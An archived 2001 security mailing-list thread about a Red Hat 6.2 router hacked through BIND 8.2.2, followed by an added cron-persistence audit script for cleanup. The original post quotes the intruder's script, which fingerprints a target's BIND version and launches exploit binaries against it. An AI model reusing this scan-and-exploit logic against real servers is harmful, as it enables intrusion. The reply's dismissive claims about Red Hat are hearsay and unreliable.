Re: bind 8.2.2_P5-9 in RH6.2

From: Dennis Stout (crazyman@rogershsa.com)
Date: 08/16/01


Message-ID: <003301c1260d$6d6d6240$020aa8c0@borg.net>
From: "Dennis Stout" <crazyman@rogershsa.com>
To: <security-discuss@linuxsecurity.com>
Subject: Re: bind 8.2.2_P5-9 in RH6.2
Date: Wed, 15 Aug 2001 20:39:24 -0800

RedHat is highly insecure on an out-of-the-box install to begin with, and
their support people, while entirely there compared to any other
distribution, simply aren't too smart. *shrugs*

A typical Slackware install does ipmasq'ing quite well, and the router I jerry-rigged
a year ago hasn't had any successful hacking attempts yet. I've
heard Debian is just as good, and the same with SuSE. I don't have any first-hand
knowledge of that, though. But everyone tells me RedHat people are too
full of themselves to be any good. *shrugs*

Dennis

P.S. No offence intended. But egos must be deflated in order to keep the
status quo...

----- Original Message -----
From: "P Krab" <kr_balaji326@hotmail.com>
To: <security-discuss@linuxsecurity.com>
Sent: Wednesday, August 15, 2001 11:04 AM
Subject: bind 8.2.2_P5-9 in RH6.2

> Hi all,
>
> I have a 486 running RH6.2 set up as an ipmasq router, so my housemates and I
> can share our cable connection. I ran a DNS server on it too, so queries would be
> faster. But it got hacked a few days back through some flaw in Bind 8.2.2, and so
> I upgraded to 8.2.3 as recommended by the RH support site.
> I found 2 or 3 directories (inside /var/spool/cron) created by this hack
> with some scripts in them, and deleted them all. But somehow, they kept
> starting up from some new dir. Could someone tell me how this happens? The
> script that runs is:
> --------------------------------
> #!/bin/bash
> # Part added to the original scan put-together by em1nem by EponaRhi
> # Thanks to etC for the bind scan that this came from ...
> #
> dig @$1 VERSION.BIND chaos txt +retry=2 +time=2 +ignore > temp.dig
> ver="`cat temp.dig |grep "VERSION.BIND\." |awk -F '"' '{print $2}'`"
> echo -en "Version $ver ... "
> for versiune in $(cat xlist|awk '{print $1}'); do
> if [ "$ver" = "4.9.6-REL" ]; then
> ./x496 $1
> break
> fi
> if [ "$versiune" = "$ver" ]; then
> ./bind $1 -e
> fi
> done
> rm -f temp.dig
> --------------------------------------------
> There are 2 other scripts, but I didn't know if it's appropriate to post them
> here. 'C' files in the dir (bind.c, scan.c, x496.c) are compiled and called
> by these scripts. Any help in cleaning out my puter would be greatly
> appreciated.
>
> Also, I traced a login back to an IP that is a web server seemingly
> belonging to some corpn. Is it possible for someone to spoof his IP while
> trying the hack, or can I be sure that it originated from one of the corpn's
> servers?
>
> Thanks,
> balaji.
>
> --
> Balaji Rangaswamy
>
>
> ------------------------------------------------------------------------
> To unsubscribe email security-discuss-request@linuxsecurity.com
> with "unsubscribe" in the subject of the message.
>

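The original poster asks how the deleted scripts keep coming back from a new directory under /var/spool/cron. The usual answer is that some other cron entry, or a file the poster has not yet found, re-creates them, so the first step in cleanup is to inventory every place cron can start a job from and flag entries that run code from temp or hidden directories. The script below is an added example for that inventory; it is not from the thread or from RedHat. It assumes the RH6.2-era cron layout (per-user crontabs in /var/spool/cron, /etc/crontab, /etc/cron.d and the cron.hourly/daily/weekly/monthly directories) and takes a root directory argument so it can be run against a constructed sample tree offline; on a real host pass "/" (or a mounted copy of the suspect disk).

```shell
#!/bin/sh
# Added example (not from the mailing-list thread): inventory cron persistence
# locations on an RH6.2-style box and flag jobs that run code from places
# legitimate packages do not use.

# Print every file cron could run a job from, under the given root ("/" on a live box).
list_cron_entries() {
  root="${1:-/}"
  for p in "$root/var/spool/cron" "$root/etc/crontab" "$root/etc/cron.d" \
           "$root/etc/cron.hourly" "$root/etc/cron.daily" \
           "$root/etc/cron.weekly" "$root/etc/cron.monthly"; do
    [ -e "$p" ] || continue
    # find on a plain file (e.g. /etc/crontab) just prints that file
    find "$p" -type f 2>/dev/null
  done | sort
}

# Print the subset of those files that reference a program under /tmp, /var/tmp,
# /dev/shm, or any dot-directory (the hiding spots the poster found).
flag_suspicious() {
  root="${1:-/}"
  list_cron_entries "$root" | while read -r f; do
    if grep -Eq '(/tmp/|/var/tmp/|/dev/shm/|/\.[A-Za-z0-9_]+/)' "$f"; then
      echo "$f"
    fi
  done
}

# Build a constructed sample tree (assumed layout, not real data) so the
# functions above can be exercised without touching the host's own cron dirs.
make_fixture() {
  d="$(mktemp -d)"
  mkdir -p "$d/var/spool/cron/.x" "$d/etc/cron.d" "$d/etc/cron.daily"
  # two ordinary package jobs
  printf '0 * * * * root /usr/bin/updatedb\n' > "$d/etc/cron.d/updatedb"
  printf '#!/bin/sh\n/usr/sbin/logrotate /etc/logrotate.conf\n' > "$d/etc/cron.daily/logrotate"
  # a root crontab that re-launches a script hidden in a dot-directory
  printf '*/5 * * * * /var/spool/cron/.x/run.sh\n' > "$d/var/spool/cron/root"
  # that script in turn executes something dropped under /tmp
  printf '#!/bin/sh\nexec /tmp/.x/worker\n' > "$d/var/spool/cron/.x/run.sh"
  echo "$d"
}

# Usage on a live host:  sh cronaudit.sh /        (review everything flag_suspicious prints)
if [ "$#" -ge 1 ]; then
  echo "== all cron entries under $1 =="; list_cron_entries "$1"
  echo "== entries referencing temp or hidden dirs =="; flag_suspicious "$1"
fi
```

Deleting the flagged files is only half the job: the root crontab in the sample is what keeps re-creating the worker, so the parent entry has to go first, and anything already running from /tmp has to be killed, otherwise the directory reappears exactly as the poster describes.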